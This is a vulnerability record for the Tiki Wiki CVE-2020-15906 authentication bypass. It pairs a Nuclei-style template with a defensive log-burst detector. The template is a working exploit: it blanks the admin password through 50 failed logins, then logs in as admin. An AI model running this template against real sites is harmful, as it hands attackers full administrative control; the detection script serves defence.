| Title | Published | Views | Family |
|---|---|---|---|
| Tiki Authentication Bypass Vulnerability | 25 Oct 2020 00:00 | – | cnvd |
| Tiki Wiki CMS Authentication Bypass (CVE-2020-15906) | 25 Nov 2020 00:00 | – | checkpoint_advisories |
| CVE-2020-15906 | 22 Oct 2020 17:26 | – | cve |
| CVE-2020-15906 | 22 Oct 2020 17:26 | – | cvelist |
| Exploit for Improper Restriction of Excessive Authentication Attempts in Tiki | 23 Jul 2020 09:20 | – | githubexploit |
| Tiki Wiki CMS Groupware 21.1 - Authentication Bypass | 21 Oct 2020 00:00 | – | exploitdb |
| CVE-2020-15906 | 22 Oct 2020 18:15 | – | nvd |
| Tiki Wiki CMS Groupware 21.1 Authentication Bypass | 21 Oct 2020 00:00 | – | packetstorm |
| Default credentials | 22 Oct 2020 18:15 | – | prion |
| PT-2020-14703 · Tiki · Tiki | 22 Oct 2020 00:00 | – | ptsecurity |
```yaml
id: CVE-2020-15906

info:
  name: Tiki Wiki CMS GroupWare - Authentication Bypass
  author: JeonSungHyun[nukunga],gy741,oIfloraIo,nechyo,harksu
  severity: critical
  description: |
    tiki-login.php in Tiki before 21.2 sets the admin password to a blank value after 50 invalid login attempts.
  impact: |
    Unauthenticated attackers can trigger 50 failed login attempts to reset the admin password to blank, gaining complete administrative access to the Tiki Wiki CMS and all its content.
  remediation: |
    Upgrade to Tiki Wiki CMS version 21.2 or later.
  reference:
    - https://packetstormsecurity.com/files/159663/Tiki-Wiki-CMS-Groupware-21.1-Authentication-Bypass.html
    - https://nvd.nist.gov/vuln/detail/CVE-2020-15906
    - https://github.com/Z0fhack/Goby_POC
    - https://github.com/bakery312/Vulhub-Reproduce
    - https://github.com/20142995/Goby
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2020-15906
    cwe-id: CWE-307
    epss-score: 0.27362
    epss-percentile: 0.97816
    cpe: cpe:2.3:a:tiki:tiki:*:*:*:*:*:*:*:*
  metadata:
    vendor: tiki
    product: tiki
    shodan-query: title:"Tiki Wiki CMS"
    fofa-query: title="Tiki Wiki CMS"
    google-query: intitle:"Tiki Wiki CMS"
  tags: packetstorm,cve,cve2020,tiki,wiki,auth-bypass,vuln

http:
  # Step 1: fetch the login form and capture the CSRF ticket it carries.
  - raw:
      - |
        GET /tiki-login_scr.php HTTP/1.1
        Host: {{Hostname}}

    extractors:
      - type: regex
        part: body
        name: ticket1
        internal: true
        group: 1
        regex:
          - 'class="ticket" name="ticket" value="(.*)"'

  # Step 2: 50 failed admin logins, sent in parallel (threads: 50), which is
  # the condition under which the vulnerable version blanks the admin password.
  - raw:
      - |
        POST /tiki-login.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded
        Referer: {{RootURL}}/tiki-login_scr.php

        ticket={{ticket1}}&user=admin&pass={{attempt}}&login=&stay_in_ssl_mode_present=y&stay_in_ssl_mode=n

    payloads:
      attempt:
        - nkQ0yYzgF5Er
        - P5UdGflH48W3
        - xFq7vKNLmhZp
        - 8zKtGnh4dW5R
        - CfXp2VbQz8Er
        - Lh3K6vPzM9Xn
        - bG4RxHpY2MdQ
        - 7zNtKh3WqF5L
        - Y8rQ2GpLx9Kn
        - C7KzLmP5X9Vh
        - v3LdX8GmQ5Kn
        - W4NzX6PqL3Ft
        - Q5GhY2VrX7Jk
        - r9KdL4PhY6Gm
        - 8XjVq5LhZ2Kr
        - L5WnQ9KzY8Pr
        - M2XdL5GrY9Kh
        - N6YzP8WkL5Xt
        - G7JqX5VbM2Kp
        - H4PrX8LkY6Gm
        - J5LhY2VqX9Kr
        - 8GrX5NqL2KhY
        - K4WnY9PzM8Xt
        - Q2XkL5PrY8Vh
        - 9JhL4VqX5GrM
        - N2XdY5PqL9Kh
        - W4LhY8KzM5Xt
        - G5JqX2VrY9Kp
        - H9PrL5XkY2Gm
        - L8WnX5KzY9Pr
        - M4XkY2LqV5Gt
        - N5XdL9PqY8Kr
        - P8XnL5VrY2Kh
        - Q4JqX9LhY5Gr
        - V7LkX5PrY2Gt
        - L2WnY9KzX8Pr
        - M9XdL5PqY4Kh
        - N8LhY2VqX5Gr
        - Q7XkL5PrY9Gm
        - X4LhY8WnM5Kp
        - G2JqL5VrY9Kt
        - H7PrX8KzY2Gm
        - J4LhY5VqX9Kr
        - N9XkY2LqP5Gt
        - W8LhY5PrX2Kz
        - G4JqL5XkY9Vr
        - P5WnY2KzL8Gt
        - M7XkY9LhP2Gr
        - Q2JqL5VrY8Kh
        - 2JqL5VrY8Kh
    attack: batteringram
    threads: 50

  # Step 3: fetch a fresh ticket and log in as admin with an empty password.
  - raw:
      - |
        GET /tiki-login_scr.php HTTP/1.1
        Host: {{Hostname}}

      - |
        POST /tiki-login.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded
        Referer: {{RootURL}}/tiki-login.php

        ticket={{ticket2}}&user=admin&pass=&login=&stay_in_ssl_mode_present=y&stay_in_ssl_mode=n

    extractors:
      - type: regex
        part: body_1
        name: ticket2
        internal: true
        group: 1
        regex:
          - 'class="ticket" name="ticket" value="(.*)"'

  # Step 4: confirm the session is an admin session by checking the index page
  # for admin-only menu entries.
  - raw:
      - |
        GET /tiki-index.php HTTP/1.1
        Host: {{Hostname}}

    matchers-condition: or
    matchers:
      - type: word
        part: body
        words:
          - "System Menu"
          - "Home"
          - "Search"
          - "Wiki"
          - "File Galleries"
          - "Settings"
        condition: and

      - type: word
        words:
          - "Show on admin log-in"
          - "Tiki Setup"
        condition: and
# digest: 4b0a0048304602210081cb80d4856e5d2d706e51480c90afedbb156987c646f4b928ed41b2e70e0fcb022100b824594764c4da0be148b03f9c2cd0a0ca4a277d6070062b7f6366dba9f504ee:922c64590222798bb761d5b6d8e72950
```
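A defender-side check for this bug, added here as an example and not part of the Vulners record or the Nuclei template above: because the bypass needs 50 failed logins in quick succession, a burst of POSTs to tiki-login.php from a single client in the web server's access log is the signal to alert on, well before the 50th attempt lands. The Apache combined-format log lines, client addresses and the 20-attempt alert threshold are constructed assumptions.

```python
import re
from collections import defaultdict, deque
from datetime import datetime

# Apache/nginx "combined" access log; only the fields the rule needs are captured.
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
                    r'"(?P<method>[A-Z]+) (?P<path>\S+)[^"]*" (?P<status>\d{3})')
TS_FMT = "%d/%b/%Y:%H:%M:%S %z"


def parse_line(line):
    """Return (ip, timestamp, method, path-without-query) or None if unparseable."""
    m = LOG_RE.match(line)
    if not m:
        return None
    return m["ip"], datetime.strptime(m["ts"], TS_FMT), m["method"], m["path"].split("?")[0]


def find_login_bursts(lines, threshold=20, window_seconds=60):
    """Map ip -> peak count for clients whose POSTs to /tiki-login.php reach
    `threshold` inside a sliding window of `window_seconds`. The default is well
    under Tiki's 50-attempt reset so the alert fires before the bypass completes."""
    recent = defaultdict(deque)  # ip -> timestamps of recent login POSTs
    alerts = {}
    for line in lines:
        parsed = parse_line(line)
        if parsed is None:
            continue
        ip, ts, method, path = parsed
        if method != "POST" or path != "/tiki-login.php":
            continue
        q = recent[ip]
        q.append(ts)
        while (ts - q[0]).total_seconds() > window_seconds:  # expire old attempts
            q.popleft()
        if len(q) >= threshold:
            alerts[ip] = max(alerts.get(ip, 0), len(q))
    return alerts


# Constructed sample log: one client hammering the form, one ordinary user.
SAMPLE_LOG = [
    f'203.0.113.7 - - [21/Oct/2020:10:00:{i:02d} +0000] "POST /tiki-login.php HTTP/1.1" 200 5120 "-" "curl/7.64"'
    for i in range(25)
] + [
    '198.51.100.9 - - [21/Oct/2020:10:00:05 +0000] "GET /tiki-index.php HTTP/1.1" 200 9210 "-" "Mozilla/5.0"',
    '198.51.100.9 - - [21/Oct/2020:10:00:09 +0000] "POST /tiki-login.php HTTP/1.1" 302 0 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for ip, n in find_login_bursts(SAMPLE_LOG).items():
        print(f"ALERT: {n} POSTs to /tiki-login.php from {ip} within 60s")
```

Because the template sends its attempts with 50 parallel threads, a short window (seconds, not minutes) is enough to catch it; the rule counts all POSTs rather than filtering on status, since a failed Tiki login is not reliably distinguishable by HTTP status alone.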